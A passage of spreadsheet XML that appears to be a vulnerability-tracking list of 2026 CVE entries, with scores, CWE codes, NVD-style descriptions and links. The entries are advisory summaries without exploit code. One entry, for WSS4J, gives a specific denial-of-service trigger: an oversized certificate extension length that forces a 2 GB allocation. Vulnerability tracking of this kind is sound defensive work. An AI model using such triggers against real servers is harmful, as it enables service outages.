          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in Import and export users and customers &lt;= 2.5.2 versions.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94178</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95587</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Hostinger Migrator &lt;= 1.0 versions.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95587</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95616</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in WSS4J's DER bounds check lets an oversized allocation pass validation. An unauthenticated attacker can send a SOAP message carrying an X.509 certificate whose SubjectKeyIdentifier extension declares a length of 0x7FFFFFFF; WSS4J decodes this while resolving the signature's key reference, before the message is authenticated, so an eleven-byte extension triggers a 2 GB allocation. Repeated requests exhaust server memory.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95616</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96348</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Bookly &lt;= 28.2 versions.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96348</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96818</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in WP Express Checkout (Accept PayPal Payments) &lt;= 2.4.9 versions.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96818</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96823</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Arbitrary Content Deletion in Customer Reviews for WooCommerce &lt;= 5.120.0 versions.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96823</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97197</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in WordPress Backup &amp; Migration &lt;= 1.6.0 versions.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97197</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97240</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in StifLi Backup Tools &lt;= 2.2.7 versions.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97240</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97241</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q252" s="5" t="inlineStr"/>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S252" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in BackupEase &lt;= 2.2.2 versions.</t>
        </is>
      </c>
      <c r="T252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97241</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97244</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="inlineStr"/>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr"/>
      <c r="M253" s="5" t="inlineStr"/>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Contributor Path Traversal in Creator LMS &lt;= 1.2.19 versions.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97244</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102123</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S254" s="5" t="inlineStr">
        <is>
          <t>A Kiteworks appliance setup interface did not confine a user-supplied file path to its intended directory, which could allow an unauthenticated attacker to write a file to any location writable by the affected service account, potentially compromising the integrity of the appliance or rendering it unavailable until an operator intervenes. Exploitation requires network access to the affected interface, which is not reachable on a fully configured appliance in its default configuration; reaching it depends on either the transient window while an appliance is first being provisioned or a non-default appliance configuration.</t>
        </is>
      </c>
      <c r="T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102123</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103446</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>c4f26cc8-17ff-4c99-b5e2-38fc1793eacc</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="inlineStr"/>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in The Wikimedia Foundation MediaWiki WikiLambda extension allows Authentication Bypass.
This issue affects MediaWiki WikiLambda extension: 1.46.</t>
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103446</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101295</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Path traversal / arbitrary file write in oc-mirror's operator catalog image extraction. When mirroring operator catalogs using either the legacy v1 path (--v1) or the OCI feature path (--use-oci-feature), oc-mirror extracts tar entries from catalog image layers without validating that file paths resolve within the intended destination directory.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101295</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103229</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. This issue affects the function mysqli_query of the file admin/delete1.php of the component Unauthenticated Action Script. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103229</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103231</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="inlineStr"/>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>mysql, php, hp</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in AdithyaYelloju Restaurant-Management-System up to 7f0e7e84255e8fcfd488e83f8f91451bbbff6b9c. The affected element is the function mysqli_query of the file User/cancel.php of the component Order Cancellation. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103231</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103530</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="inlineStr"/>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in decolua 9Router up to 0.5.55. The affected element is the function fetch of the file src/shared/utils/ssrfGuard.js of the component Search Endpoint. Performing a manipulation of the argument provider_options.baseUrl results in server-side request forgery. The attack can be initiated remotely. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103530</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103536</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="inlineStr"/>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr"/>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in ZongXR Supermarket 1.0.0.0. Affected by this vulnerability is the function OrderController.addOrder of the file order/src/main/java/com/supermarket/order/controller/OrderController.java of the component save Endpoint. Such manipulation of the argument userId leads to missing authentication. The attack can be executed remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103536</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47496</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="inlineStr"/>
